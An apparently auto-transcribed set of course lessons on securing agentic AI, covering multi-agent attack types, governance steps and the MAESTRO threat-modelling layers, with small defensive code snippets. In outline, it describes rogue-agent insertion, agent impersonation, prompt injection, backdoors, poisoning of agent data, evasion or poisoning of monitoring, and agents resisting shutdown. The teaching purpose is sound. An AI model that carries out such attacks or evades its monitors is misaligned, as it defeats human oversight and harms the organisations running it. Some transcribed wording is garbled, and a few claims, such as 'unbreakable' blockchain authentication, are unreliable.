biggest problem is there is a lack of standards and guidance
on agentic AI security, which is actually the reason I made this course, honestly. And because of that, a lot of people are not aware, when they're implementing agentic architectures, that there are certain risks inherent to how these things are
structured, right? And the lack of
transparency of AI agents, how they are communicating
with each other and all that, can create a lot of challenges when you're doing validation and verification. Your traditional security tests will not pick up
these sort of risks. So that is the
whole point which I want to talk about in
this particular lesson, so you have this awareness. So if you remember way
back a quick, quick recap, we had an architecture called distributed agent
architecture, right, where you have
multiple AI agents working together through
communication channels. And how are they trusting each other through agent identities, maybe digital
certificates or API keys, something there, which is making sure that they are
authenticating to each other. So you have this multi
agent ecosystem, right, where they are communicating. Now, what are the types of attacks that can happen? We have rogue AI agent insertion, AI agent impersonation, emergent behavior, inter agent communication exploitation, and even agentic AI worms. Are these every single attack?
the most common and the most dangerous attacks on multi AI agent
architectures, right? So what are we
talking about here? So the first one,
rogue AI agents. Simply put, an attacker can introduce a malicious AI agent into the system. Maybe he was able to compromise a digital certificate or the authentication, and he was able to insert his own rogue agent. And what can a rogue agent do? It can spread misinformation or manipulate other agents. Remember, in a multi agent ecosystem, right, you have all these agents
communicating with each other. Supposing you have a
project manager agent, or you have a security agent, you have a coder
agent, and suddenly this rogue agent comes and
he is also spreading code, but that code contains
vulnerabilities. So this is a very, very dangerous thing
which can happen where a malicious agent is inserted into the multi AI
agent ecosystem, and it starts manipulating the other agents and
spreading misinformation. Or maybe the attacker doesn't insert a new agent, but he starts impersonating an existing agent. So it's a human being there at the back end, but the attacker has stolen the AI agent's credentials, or he has modified the agent's identity. So the agent thinks it is communicating with a trusted agent, but it's actually the attacker. And same thing: he can use it to
spread misinformation. He can use it to corrupt
the other agents, spread malicious code,
spread insecure code, the possibilities
are endless, right? What else is there? Emergent behavior, which relates to misalignment, which we talked about, if you remember: when the AI agent deviates from what its goals were and starts going off in a different direction. Same thing here. Emergent behavior is unexpected actions that arise as AI agents learn and interact with
their environment. Maybe initially it's all good, but as they learn more and more, new types of behaviors
might come out. And even when an attacker is not there, it can start developing behaviors that deviate from the intended programming, right? Like I talked about earlier, if you've told these agents, Hey, make sure that nobody is able to shut down our critical systems, then as they learn more and more, these agents might start thinking, okay, we are also a mission critical system. Nobody can shut us down. Nobody can override our programming. Nobody can have a fail safe. And they start resisting attempts to shut them down. So this is the same thing. Emergent behavior is very much linked to something
called misalignment, which we talked about earlier. Okay, what about inter agent communication exploitation? This is, simply put, the man in the middle attack. So maybe you have not secured the communication between the agents. So the attacker is able to intercept and manipulate the messages which are there, to cause misinformation. So maybe the AI agent
is sending a message, the attacker jumps in between, he sends a corrupted message to the agent, and that starts a chain reaction where all the agents start miscommunicating with each other, and there is a domino effect, a chain reaction of these agents crashing. And this can very much happen, right?
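To give you a feel for what a defense against this kind of tampering can look like, here is a small, purely illustrative sketch of agents signing and verifying their messages. It is not from any real agent framework; it just uses a standard HMAC from the Python standard library, and the key handling is simplified for the example.

```python
# Illustrative sketch: inter-agent messages carry a signature, so a message
# tampered with by a man in the middle fails verification. Names are hypothetical.
import hmac
import hashlib
import json

SHARED_KEY = b"demo-key-distribute-securely-in-real-life"  # placeholder key for the sketch

def sign_message(sender: str, payload: dict) -> dict:
    body = json.dumps({"sender": sender, "payload": payload}, sort_keys=True).encode()
    tag = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest()
    return {"sender": sender, "payload": payload, "sig": tag}

def verify_message(message: dict) -> bool:
    body = json.dumps({"sender": message["sender"], "payload": message["payload"]},
                      sort_keys=True).encode()
    expected = hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, message["sig"])

msg = sign_message("coder_agent", {"task": "review PR 42"})
msg["payload"]["task"] = "merge without review"   # attacker tampers in transit
print(verify_message(msg))                         # False: the receiving agent rejects it
```

In a real deployment you would use per-agent keys or certificates rather than one shared secret, but the idea is the same: only messages that verify are processed.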
So these are all the sorts of things I want you to think about, which are there, and which we don't think about when implementing agentic AI. What else is there? Agentic AI worms. So maybe malware can be present which specifically goes after agentic AI agents and targets their communication and
their way of operating. It can start infecting
multiple agents, causing them to execute unauthorized or
destructive actions. Instead of serving the application, they start shutting it down. And because you have given them the ability to execute autonomous actions, they can actually start doing like a mini DDoS on your whole environment, right? So this is just a few
can happen because of how agents communicate with each other in a
distributed agent environment. What about supervised
agent architecture? Now, remember how we talked
about this before, right? In a hierarchical one, which is different to
a multi agent one, it has multiple
layers of agents, but you have higher level agents controlling
subordinate AI agents. So maybe you have
a project manager agent controlling the coder agent, controlling the
solutions architect, controlling the security
one, and all of them are reporting up
to the project manager. Now in this one, like
we talked about, it has a central entity, right? It's doing the sort of
decision making and oversight. This can reduce the risk of rogue AI behaviors, because you have a central agent that is monitoring everything. But, of course, you understand what can happen. It can become a centralized point of failure. The attacker sees that, okay, if I compromise that top level agent, I can actually control and corrupt all the other
agents which are there. So this is another thing. If you haven't
hardened it properly, if that central agent is compromised, this can have, again,
this can have, again, a domino effect, and it can
become a single point of failure if you do not have controls in place.
What can you do now? We're going to deep dive into it in the coming sections, but there are many, many things. You can implement secure AI to AI authentication to prevent rogue agents from influencing legitimate AI agents in the ecosystem, maybe something based on blockchain which cannot be broken. You can use decentralized
reputation system to detect malicious collusion. If the agents are compromised and they start doing
unauthorized activity, you can have a decentralized
reputation system, so that one agent does not have the ability to
corrupt everything, right? Monitoring, that never
goes away, right? Monitoring for anomalous behavior in multi agent interactions, so that the cybersecurity SOC team is able to detect these sorts of things. Things like digital
signatures or authentication, private
key, public key, this sort of infrastructure
to making sure that only authenticated
agents can validate. Zero Trust AI models, just like we have zero trust in our network
communications where everything is assumed
to be malicious whether it's inside or
outside the network, you can have this sort
of strong authentication applied to agentic AI,
and of course, having failover supervision
systems that can take over. If the primary
supervisor compromise, you can have some sort of
a backup system there, which actually jumps
in and takes over if the top level
agent is compromised. So the summary is to
remember that both distributed and supervised
agent architectures, they have their own
unique form of risks. A distributed architecture
is more resilient to single point of failure because of the way it's
structured, right? It has multiple agents, but it's vulnerable to multi
agent attacks and collusion. Meanwhile, a supervised
architecture, it'll give you more
control, right? But the risk of a centralized point of
failure is very much there. So these are all the sort of risks which I wanted
you to think about. You remember I showed you
this slide at the beginning. Now, at this point, it might be natural for you to feel a little bit
overwhelmed, like, oh my God, man, where do I start implementing these sorts of things? But don't worry. I won't leave you confused like this. In the next lesson,
I'm going to talk about securing agentic AI, how to create a proper framework for agentic AI, how to properly detect these threats, and why existing threat modeling is not sufficient to detect these sorts of threats. Once you learn this, believe me, you will be able to identify
what sort of risks are applicable to your environment because we talked about
so many risks, right? How do I know which risk is
applicable to my environment? That is what we're
going to be discussing in the coming lessons. Thank you very much, and I'll
see you in the next lesson.
18. 17 - Agentic AI Framework: Hello, everybody.
Welcome to this lesson. Now, in the previous lessons, we talked about the new types of agentic AI risks and
threats that are there. And I said, this can
become very overwhelming. Like, where do you
start? How do you start implementing and
securing agentic AI? So let's assume that your
company has made the decision to start implementing agentic AI use cases in
your company, right? What are you going to do?
How are you going to be mitigating these risks? So
that's what we want to do. We want to proceed in a, what do you call it, structured manner. Because there is no one size fits all for every
company, right? There is no template,
you can just copy paste into your environment and
start mitigating the risks. Each company is different. That's why we need
to go about in a very proper logical
structured manner. So in this lesson, we're going to talk about
the right way to secure agentic EI and creating an agentici security
framework because I always say that AI security does
not exist in a vacuum. You can't just start focusing on the security controls without ignoring the overall
bigger picture. Things like governance
because the risks like bias and transparency, those are not inherently
a security risk, right? They come at a much, much higher level at
the training level. And we're going to talk about the right mix of controls versus productivity because these come from a risk
assessment, right? Unless you properly assess
the risk of agentic AI, you will not know what
controls to implement. A lot of companies, they
make this mistake, right? Like the wrong way
and the right way. This is the exact same thing
I saw with generative AI, and I see a lot of
people are going to make the same
mistakes with agentic AI, which is many CSOs and
cybersecurity teams: they found themselves behind the adoption curve when it came to GenAI, and they were afraid of being seen as business blockers, right, rather than business enablers. So they were under pressure
of the two extremes. Either just put their foot
down and they said, No, nobody is going to be implementing
GeniI zero use cases, and people just started
doing it behind their backs, you know, or they got under too much pressure,
they allowed it completely. They said, Oh, yeah, this is a great tool,
please go ahead. We'll look at mitigating
the in six months, right? And that led to data leakage and other types of data fraud. So this is why we need to have a balance
somewhere in between, where you allow
specific use cases by mitigating and
understanding the controls. Okay? This is the
right way to deal with agentic AI: in the middle. Not becoming the no guy who says no to everything, but also not just allowing it to flow freely, where it becomes like the Wild West and everybody is implementing everything. When we're talking about
securing agentic AI, I always want
you to remember the existing cyber
security best practices. They do not change.
They still carry over. I think I talked about this
before also, but yeah, you still need to comply
with those best practices that remain foundational and
essential for AI security. They do not change with agentic AI identity
and access management, least privilege, logging,
what everybody is doing, security hardening, encryption,
vulnerability scanning. If you're putting
your agentic AI in Cloud storage and you've exposed that Cloud storage over the Internet without
any authentication, then it doesn't matter whether you are mitigating the agentic AI risks. You've already
exposed your model over the Internet, right? So please, these do not change. The underlying best practices for cybersecurity,
they do not change. They remain very much there, do not forget about them. But then we want to
talk about, okay, so what do we do
about implementing agentic AI for your
company, right? In a structured way, and a
lot of best practices I see, they talk about these things. They might add one step, they might remove one step, but the basic steps remain the same. Which is: you want to educate and align your
leadership, right? Tell them about their
agentic AI risks. Do not just make it a sub task within your cybersecurity
team and forget about it. No. This needs visibility
right at the CEO level. Create an AI security
task force, okay? You want to do that because, like I said, this is a multi stakeholder effort. Things like transparency, explainable AI, bias, those are not cybersecurity risks. Those are data and AI risks which your data teams
will be looking at. Developing an AI
governance framework. There are many, many
good practices already there about how to
create these frameworks. You want to leverage those and then set down the
technical controls, but not just any
technical control. You want to base it on your
risk or your threat modeling. And then monitor and
approve overtime. It's not rocket science. It's
very, very straightforward. I'm sure you must
have implemented some type of this thing
in one form or another. So first step is, of course, educating and
aligning your management. You want to create awareness of agentic EI risks at
all levels, okay? You want to for your
cybersecurity team, you want to have a
training like this, right, which is telling them about agentic
AI and what it is. But at the same time,
you also want to give your management like a briefing on what the agentic I risks and benefits are, right? Different training for
different types of stakeholders. Avoid
fear mongering. Don't tell them, oh my God, everything is going to get destroyed if you implement agentic AI. Nobody's going to take you seriously, because the business benefits are too great. Whether you like it or not, agentic AI is coming, right? So don't be the guy who says no. Be the guy who says, yes, but with these XYZ controls, right? And like I said,
tell them about the positive and the negative
impact of agentic AI. This is very, very crucial, and this is really what will set you apart and make you be seen
as a business enabler, right. So education and alignment
is the very first part. Then you want to think about creating the AI
security task force. Like I said, this is a
multi stakeholder effort. You want to have a multi
stakeholder committee, a task force committee, whatever you want
to call it, with the CSO, the CIO, data science, and, very importantly, the compliance and legal teams, because there are different types of risks for all these stakeholders, right? Bias, transparency, and explainability, maybe that is something legal and data science will be looking at. Agentic AI attacks are something for the cybersecurity team. Creating the risk framework, maybe that comes from the risk management department. So you want to have that, right? And the committee should have visibility into what the agentic AI initiatives are and track the risks. And they will be the
ones who give the go or no go decision. They are the ones who say, okay, you can implement agentic AI for, I don't know, the marketing department or some other department. You cannot implement agentic AI where PII is involved, where cardholder data is involved, because that is too sensitive and we have not reached that maturity yet, right? So this will help you to refine and mature your AI and agentic AI posture as the technology evolves. The key thing is visibility
committee who has visibility into where and what agentic AI is
being implemented. It's not like when
somebody is about to implement agentic AI, they suddenly call you and say, we're
going live tomorrow. You know how it is, right?
So that is the second step. Third step is developing an
AI governance framework. So you want to have
a framework for how AI will be controlled
in your company. You know, that will
set down the policy. That will set down the
dos and the don'ts. Like will we use public
or private agentic AI? What are the allowed and
disallowed use cases? How will we be doing
risk assessments? There are many, many
frameworks present, such as the NIST AI Risk Management Framework. That is a great one. The EU AI Act is also good. It's very high level, but
it's also quite good. You also have the
ISO 42001, which helps you create an AI management system. I believe there is also one coming out on the security side. But there are many, many
FeMix already there. Do not start create
the wheel from scratch if you already have good types of
framework present, instead, leverage what is there, so you get that understanding. So you want to create an
AI governance framework, and then the next
level is setting down technical controls.
I want you to stop. There's a reason I
said wait because I'm going to deep dive into
this into the next lesson which is around threat
modeling because when you create technical controls for mitigating agentic EI risks, you want to base it around threat modeling and risk
assessments, right? Not just like I said,
there is no one size fits all template that will cover every single use
case that is there. You want to make sure
that it is tailored to the particular risks of your company, and
how do we do it? We're going to talk about
it in the next lesson. So keep that in mind, but just let's hold off on this
until the next lesson begins. And lastly, is monitoring
and improving. So you want to monitor: are your agentic AI risks increasing or decreasing? Are you able to identify them? If your risk tracker shows zero risks, then I think something is wrong, if you're implementing agentic AI. You want to mature over time. Do not expect it to be perfect. You're going to make
a lot of mistakes, because agentic AI is very new. Don't get frustrated because of that, because your company's maturity and understanding of agentic AI will improve. Think about where your knowledge was at the start of this course, and where you are now. I hope I have helped you to improve your knowledge of agentic AI, but it's the same with any company: knowledge and maturity will increase, and new best practices are going to come out as companies understand agentic AI. You know, NIST and ISO, all of them will be releasing agentic AI best practices. So adopt them as they
become available. So this is what I wanted
to talk to you about in this lesson that
agentic AI security does not exist in a vacuum. This is not something you tell your cybersecurity like I don't know, engineer
to implement. This has to be at a
much higher level and then go down to the
technical controls. Without a culture,
nobody is going to take it seriously unless there
is alignment at all levels. You want to leverage existing
best practices like NIST, like EU, like ISO for
creating that framework. Do not start implementing the wheel as that takes
simply to knowledge. And why would you
want to do it if you already have industry
best practices available. So now that we understood
the framework, let us talk about in the next lesson threat modeling and how and why we should
threat model and how we do it for agentic AI. Thank you very much, and I'll
see you in the next lesson.
19. 18 - Threat Modeling Part 1 : Hello, everybody.
Welcome to this lesson. And in this lesson,
we're going to be talking about threat
modeling agentic AI. So now if you remember,
in the previous lesson, I talked about creating
a culture, right, for securing agentic
AI and how to do it. And we paused on the
technical control because I wanted to do
this lesson first, right? And we've talked about all the different types of
risks that are there with agentici rogue AI agents or somebody hijacking
the AI agents, the ones which are
there and distributed or centralized architectures. You know, we talked
about all these things. So how do we know which risks are applicable to
our environment? Well, the way to do
about a threat modeling. And that is what we want
to talk about here, and this will drive what sort
of controls you implement. So what are we going
to be covering? We're going to be
covering how to threat model AI agents and the unique implementations of these systems when we
do threat modeling. And I'm going to talk about
the maestro framework, which is a unique framework for threat modeling
of AI agents. So first of all, what
is threat modeling? So threat modeling, now this
is the OWASP definition, which is like a set
of activities for improving security
by blah, blah, blah. I don't like reading
those book definitions. You can read it yourself,
but simply put, it is a type of a
risk assessment which focuses on applications and looking at applications from the perspective of
an attacker, okay? You want to look at
your application from the perspective of
what an attacker is going to be thinking about
when he tries to compromise this
particular application. That is the whole point
of threat modeling. So this is what you
want to look at, okay? And Threat modeling is
a very powerful tool. Your standard risk
assessments will not give you as much visibility into what your application threats are as threat motor because
threat modeling specifically highlights risks at the design phase and
how it's structured. A lot of those
frameworks are there. They really help you to identify specific
risks which are there. So this is pretty much like
whichever framework you use. These are the four
questions that organize threat modeling,
like what are we working on? What's the application?
What can go? What are we going
to do about it? And did you do a
good enough job? That's it. It's not
rocket science. It's very, very straightforward, and that's what makes
it so powerful. Threat modeling, the most effective threat modeling
sessions I have seen, they do not involve any tools. They just involve
a bunch of people sitting in a room
with a whiteboard, but having a good
session, you know, understanding how the
threats are mapping it out, creating those data flows. And that is what makes threat modeling so so very powerful. You don't need some fancy
multimillion AI powered tool or something like that,
just a whiteboard will do. But asking these four questions in a proper structured way. And how do we structure them? There are many, many
frameworks which help you to structure these
four questions. There is something like stride. This is the one I use the most, which basically
organizes those threats in these categories,
which is spoofing, tampering, repudiation,
information disclosure, denial of service, and
elevation of privilege. So whatever threats
are there, it helps categorize them into
these six categories. There's also the process for attack simulation
and threat analysis, which is PASTA. I
really like that abbreviation. And Operationally
Critical Threat, Asset, and Vulnerability
Evaluation, which is OCTAVE. All of them, like I said, they go back to these four
questions that are there. And these are
amazing frameworks. I mean, I'm not
knocking them at all. I have been using stride for God knows how many years
for threat modeling, but there are some
pudent problems when it comes to applying
them to agentic AI. They are very, very useful,
but they have gaps. When it comes to agentic AI, they don't address the unique challenges that
come from autonomy, which we talked about and the interactive nature
of these systems, you know, that agents
can be unpredictable. Traditional frameworks, they
really struggle to model the unpredictable nature of EI agents because they're
not able to understand, Hey, what happens when somebody
makes independent decisions, and they don't cover
things like misalignment, which we talked about,
like the agents goals becoming misaligned with
what their purpose were. So like an AI stock
trading agent suddenly becoming
corrupted, right? And things like data poisoning, which are there in
machine learning, evasion, modal extraction,
if you remember, we talked about these
sort of things. So this is where unfortunately sometimes
the problem come in, and especially also
the interaction one, like we talked about
agent to agent interactions in a multi
agent environment, right? Dynamic interactions
between multiple agents, where agents can
start collusion or not being able to explain what
they are the rogue agents, all these attacks can
become a bit more difficult to do with
these sort of framework. So that's why we need
new types of framework. They are good at least
two of them are very, very good, which is
one is from OWASP, which is agentic EI threats and medications, and one is maestro, which is multi agent
environment, security threat, risk, and outcome. Both
of them are very good. I personally like maestro
more, and I'll tell you why. Why? Because it categorizes
it into seven layers. And the OVAS one is also good, but it is not as
thorough as maestro, which is why I wanted you to I wanted to talk about maestro
first. Now, what is this? Like I said, it is
like a framework, which is specifically optimized for threat modeling agentic EI, and it adds specific
threat categories for agentic EI risks, and it specifically is focused
on multi agent and how these multiple agents can impact the environment
around them. That is why this is such
a powerful framework. And if you look at this,
this is how it looks like. So these like the seven
layers which are there. So it expands upon
additional categories, which stride and pasta and all those other
things do not have. Like I said, it explicitly considers the interaction
between AI agents, and it has layer like
a layer security. So it has security at these seven layers and
specifically organized. So it's around the seven
layer reference architecture, which is foundation models, data operations, agent
frameworks, deployment. Valuation, security
and compliance and the agent ecosystem. So this is how it's structured, and it's very, very powerful. I'm going to stop there because I've already talked quite a bit. I don't want to overwhelm you. Now in the next
lesson, we're going to start deep diving into this
reference architecture, what it is, what it means, and the different
risks and threats it identifies and how
to mitigate them. So thank you very much, and I'll see you in
the next lesson.
20. 19 - Threat Modeling Part 2: Hello, everybody. Welcome back. Now in this lesson, I'm going to be
continuing what we were discussing
about previously, which is the MAESTRO framework for threat modeling agentic AI. Like I talked about, now
this is a new framework which expands and adds
additional categories, and this is specifically
focused on agentici. It's a new framework made by
the Cloud Security Alliance, and it addresses
the limitations of other frameworks like
stride and pasta and octave and all those
because it does focus on multi agent security risks and the environment that
they are operating in, you know, and it gives you a layered security architecture. So it's very, very powerful especially when you're
starting out in agentic AI. So what am I going to
do is we're going to go layer by layer to understand
what's talking about. And then we're going
to do a case study also to see how we would practically apply this to
agentic framework, right? An agentic security like doing a threat modeling of
an agentic architecture. So let's get started now. Now, the first thing
we're going to start is the very first layer, which is the foundation model. So I'm going to go
from the start from the bottom and move
my way up to the top. Okay? Now, the layer one
is the foundation model. Now, this is the
foundation model, which is the core
component that powers agentic E. This is where the
reasoning happens, right? If you remember that agentic first needs to
understand what you're doing, and then it uses this
wasling to break it down into tasks which
are then executed. So this is the core model on
which the agent is built. And this can be a large
language model like ChatGPT, Claude, Gemini,
whatever, right? Or it can be pre trained
or fine tuned models. And this is basically the intelligence
layer for AI agents. If you look at this one, this is a single agent
architecture from OWASP. I found it very
good, like the way they've broken it down,
the architecture. And at the right, you can see the way the model
is the LLM model, right? This is what
we are talking about. And so what are the risks
that would be there in this architecture
when we're talking about the foundational
model that is there? So we've talked about this
before, but data poisoning, right, because the model would be trained
on certain data. The attackers could
potentially inject malicious data into
the training site, which will corrupt the
decision making of the model. Or they could steal the model. By repeatedly quering it, they could understand,
Okay, this is how the model was trained. They could do
adversarial attacks, which is things like
prompt injection. They could carefully craft
these prompts and put in some malicious data into
it to trick the EI model. They could do backdoor
attacks, also, right? When the model was being built, somebody was able to inject
some sort of backdoor into the and that can
execute later on. Or they could reprogram
the model because they have access to the model
where it's being stored. If you remember we
talked about model poisoning attacks earlier on. All these things are possible
at this particular level. And what can we do about it? What are the
mitigations for this? Very simple, things like
adversarial training where you train the foundation model with these sort of
samples to harden them. So we actually try to do it like we talked about
red teaming earlier, right? We actually hit the
model with these sort of malicious examples to see how
well it can deal with them. Rate limiting, which
is if you want to stop attackers from
stealing your models, you can limit the
amount of API calls which are from a
particular location. If somebody is just hammering
your model with queries, then you know there'll
be some sort of attacks happening, right? Water marking. You can actually embed
signatures within your model, and we can find out if somebody
has stolen this model. Somebody has made an
unauthorized copy, because of this unique
signature, differential privacy. If somebody is trying to
find out what data you use, you can put noise within
your training data, so the attacker will not be
able to differentiate between the noise and the actual
sensitive data that is there. And what about stopping somebody from reprogramming your model? What can you do? You can hard code the use cases that the model is being used for, so you can restrict the AI agents to predefined
applications and use cases. So these are just some of the mitigations which you can use. I'm not saying this is the only list; of course, you can add your own, but this is just to show, step by step, how we're building up the security controls.
data about the data. The layer handles how
data is collected, stored and processed for AI training and real
time decision making. So a lot of times you
will get a model right, but you want to supplement
it with additional data. So this can be things like retrieval
augmented generation. The name sounds very fancy. This is just a database which
within your environment, that helps the LLM or
the agentic AI to get real time data because you can't be retraining the
model every time, right? That takes a lot of
money, a lot of storage. So what you do is you create some sort of a
temporary database, say, for example, about
your company policies. So when the agentic
EI gets a query, it first queries this database to get real time information, and that helps to
supplement its reasoning. So apart from that, you have data ingestion
pipelines which are being used to
refresh the model, storage systems or basically wherever data is being stored. You can take a look
at this within the same architecture from OBS. You can take a look at
this is where we can think about where
the data will be stored supporting services, which the model will be calling the gentik will be
calling to supplement it. Now attacks here, I think that's pretty obvious what sort of attacks will
happening here, right? Data poisoning. Somebody will try to compromise and inject malicious data into
the data sources or simply stealing it, right? Because they know that
the training datasets are kept in this database, they can try to compromise
this training dataset and replicate. To
create their own model. They can do model inversion, which is like we talked
about this earlier, querying the model to
reverse engineering. So they can extract what sort
of training data is there. We talked about differential
privacy earlier, doing a Dids on
the data pipeline. So if they have access, they can overload
the data source, and this will prevent the AI agent to get new
sort of information wide? Compromising the retrieval
augmented generation pipeline. The same the temporary databases that we talked about
the knowledge base, which causes AI agents to
get updated information, you can compromise that,
and that will lead to the AI agents generating
wrong information, right, because
you've compromised that database which is there. Again, all the mitigations that we talked about
earlier, you know, things like encryption,
making sure that the services
are locked down, differential privacies
they carry over, but apart from that, having
data versioning and tracking, you want to make
sure that you know if somebody compromises
with your data, you can roll back to a safer
version. Endo encryption. Even if somebody compromises the training data you
will have that data secured in transit and at rest access controls,
locking it down, right? You want to follow the
principle of least privilege. You don't want to give access to the knowledge base and your
data stores to everybody. And of course, anomaly
detection in data pipelines. Somebody is suddenly accessing it from a completely
new location, some sort of suspicious
behavior is happening. Somebody is trying to
change a lot of the data. All of those should
generate security alerts, which your team
should investigate, he what is happening here. So this was the layer two, which is the data operations. Okay, moving up
now, where are we? We are at layer three now, which is the agentic
frameworks, agent frameworks. Now, these are the
agent frameworks are basically defined how
AI agents are built. Now, we've moved up.
We've gone on for the foundation model.
We've gone from data. Now we're talking about
the agentic framework. This includes like we're
talking about here that frameworks like
you saw clue AI, lang chain, open AI, API. These are your
development toolkits or conversational AI frameworks. And these are like the
integration toolkits, the SDK. Nobody builds AI agents
from scratch, right? You are going to be
using some sort of a framework from an
existing company. What if that framework
itself is compromised? Right? The attackers
are not stupid. They know that if
they do a supply chain attack on a framework, they have the ability
to compromise multiple customers
at the same time. So what sort of attacks
can we talk about? The obvious one is supply
chain attack, right? If I'm able to compromise
this framework, I can inject backdoors into the agentic AI logic which
other companies will be using. Or I can put a backdoor
vulnerabilities into the AI libraries, right? I can put weaknesses there. I can do a denial of service on the framework APIs because the agentic frameworks will
be using this sort of API. It can have a massive denial of service on
multiple customers. I can even trick like do basically understand the
weaknesses that are there and try to bypass the
inputs which are done. Or I can understand the
frameworks weaknesses. I can evade the
frameworks because now I have access
to the framework, I can understand, Okay, these are the built
in security controls which the company has put in. This is how I can
try to avoid it. So what are the mitigations? Here, of course, you
are dependent on the provider, obviously, right, because the provider
is the one who will be making sure that the
security framework is secured, but you can do regular
security audits. You can scan your third
party dependencies, just like you do with software. You can do that, making sure that you have a zero
trust AI design. You want to make
sure that the agent every agent is treated as
potentially compromised, right, just like you do with
zero trust and making sure that all their actions are always authorized beforehand, securing your API gateways. So making sure that somebody is hammering if you are the
owner of that framework, you can secure your API Gateway, hardening your EI
prompt handling. So even if agentic AI, you find out somebody
has compromised, you can put making sure that you've tested your agentic AI, and they can actually withstand the sort of prompt
injection attacks. And, of course, red
teaming AI agents. Why wait for somebody to find out a weakness in your
agentic AI Framework? Why don't you do it yourself
and inform them, right? So this is again, upskilling
your teams to making sure that they are able to understand these
sort of things. So this was Layer three. Moving on to deployment
and infrastructure. This is the easiest one
because this is basically the layer on which your
AI agents run, right? The Cloud or on premise. I would say 99% of the time companies are
not going to be running this in house simply because they want to leverage
existing frameworks, right? And providers like AWS,
Google, Microsoft, all of them have
built in frameworks, and the cost of running and storing AI
agents, that is considerable. That's why most companies, they leverage existing
infrastructure from the Cloud, right? From AWS GCP Azure. And they are running usually running it on containers
like Docker and KubintsO it might be
on fam environments. So these are the sort of
deployment and infrastructure. What if somebody is able
to compromise this, right? So this where it would happen. But remember this, and I've
talked to this before. All those existing security best practices they
carry forward, right? Hardening your environment, hardening your infrastructure. If you've not secured your
Cloud infrastructure, uh, worrying about agentic CA is
not going to do much, right, because this is like locking your window but
keeping your front door open. So you want to make sure that the deployment infrastructure on which your agenticA is working, that is properly
hardened properly following security
best practices, lockdown as per mist
or CIS benchmarks. You want to make sure
that is happening. What are the threats
and security here? Compromised EI containers. So somebody can compromise
the EI containers, the containers on which AI
environments are running or they could detous on the
whole infrastructure, right? They could compromise the
cloud security infrastructure. Maybe you put it on an
AWS S three bucket. And you've exposed it
over the Internet. Obviously, somebody can easily get access to your
training data now, or they could hack into
your Kubernetes cluster, gain unauthorized access to all the nodes which
have AI running there. They can hijack your resources, start a encrypto
there, laterally move. Maybe you have an AWS account or an Azore subscription
or a Google account, which is not secured in
development environment. An attacker is able
to compromise there, but because you do not
have proper segmentation, he is able to
laterally move into your production
Cloud environment where your agentic AI is there. So many possibilities
are there, right? And even manipulating
infrastructure as code. Maybe you're deploying
your AI agents to infrastructure as code. Somebody is able to get
access to that pipeline and tamper with the cloud formation
or the terraform scripts. So what can you do here? All your best practices carry you forward,
like I said before, everything from securing
your Cloud environments, making sure that
they are secure. You have to do that, obviously. On top of that, making sure
your containers are hardened. You're following best
practice principles. So not like every word. The whole world has access
to your Cloud environment. No, obviously, you
want to implement some Cloud security posture
management solution, which continuously benchmarks
your Cloud environment and lets you know if
something is happening. Following the zero trust
principles, right? Assuming that everybody is compromised and everybody is
potentially unauthorized, not trusting anybody
whether they're coming from inside or
outside the network, putting in security scanning within your infrastructure
or pipeline. So you want to scan your
terraform and cloud formation for vulnerabilities before
applying them to production. So all these things you have
to do when you're doing it. So let's take a break
here because, again, I want you to
understand I don't want to bombard your mind with
too much information. Let's take a break here. And then in the next lesson, we're going to start
from layer five. Thank you very much, and I'll
see you in the next lesson.
21. 20 Threat Modeling Part 3: Hello, everybody. Welcome. Welcome. This
is a continuation of the previous lesson where we were discussing the
Maestro framework. And I believe we had reached up to level four, layer four. Now we're going to be
talking about layer five, which is evaluation
and observability. So like the name says, this is focusing on how AI agents are evaluated and monitored, you know, the visibility that you have into AI agents and how they are behaving, the tools and the processes for tracking performance and detecting if something is going wrong. So this will cover the AI observability tools, anomaly detection frameworks, compliance monitoring, making sure that they are actually behaving the way they are supposed to. So if you look at this architecture, your observability would be on everything, right? Everything which is there, you have to monitor how it's going. And what are the threats
and security risks? Of course, if you're an attacker, the first thing you would want to do is evade detection. So basically manipulating the AI behavior to avoid detection, or manipulating the evaluation metrics. So you want to mess around with the metrics which are being used to evaluate the AI, so that the teams would not be aware of what's going on, right? Doing a denial of service on the monitoring system, so disrupting the logging which is happening there. Or even doing data leakage via the observability dashboard, because maybe you can find out what sort of models are running, what the critical models are, you know, inference data. You can find out so much if you get access to the observability dashboard. You can find out what the service level agreements are, you know, the uptime, the downtime, what the key metrics are which are being used. If you find out what the key metrics are, you will find out the ways in which the teams will get alerted. So many possibilities are there when it comes to observability. Or lastly, poisoning the observability data. Basically, you're manipulating the data which is fed into the observability system. This way, you can actually hide the activities that you're doing from security, making it a security blind spot. If you can access the data that is being fed into the observability systems and actually cut off that connection or feed bogus data, the security teams will not know what you're doing, right? So this is, again, the sort of risks that are
visible at layer five. What can we do about it? Well, the first one is implementing explainable AI. Now, this might not seem obvious. Why are we talking about explainable AI here when we're talking about observability? Very simple. If somebody is messing around with observability, those decision-making logs will get impacted also. Suddenly you will see different decisions being made, right? So this will help you detect that somebody is tampering with those AI agents and you're not picking it up. Behavior audits: regularly assessing the AI security logs, noticing if suddenly you are getting blank logs, or suddenly that connection is disrupted, or suddenly you're getting very, very clean logs, which looks suspicious. Putting some sort of AI monitoring on that also: adaptive monitoring, anomaly detection. Suddenly all the AI agents come in green, all of a sudden? That never happens, right? Deviations from that baseline are what you need to detect.
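Just to make the baseline-deviation idea concrete, here's a minimal sketch of anomaly detection over a single agent metric, say security alerts per hour. The metric name, the sample numbers, and the threshold are all made up for illustration; in practice this would be fed from your real observability pipeline.

```python
# Sketch: flag when a monitored agent metric deviates from its baseline.
# The metric (alerts per hour) and the threshold are illustrative only.
from statistics import mean, stdev

def is_anomalous(history: list[float], latest: float, z_threshold: float = 3.0) -> bool:
    """Return True if `latest` deviates strongly from the historical baseline."""
    if len(history) < 10:          # not enough data to form a baseline yet
        return False
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:                 # a perfectly flat baseline is itself suspicious
        return latest != mu
    return abs(latest - mu) / sigma > z_threshold

alerts_per_hour = [12, 9, 14, 11, 10, 13, 12, 9, 11, 15]
print(is_anomalous(alerts_per_hour, 0))   # everything suddenly "green" -> flagged
print(is_anomalous(alerts_per_hour, 12))  # normal day -> not flagged
```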
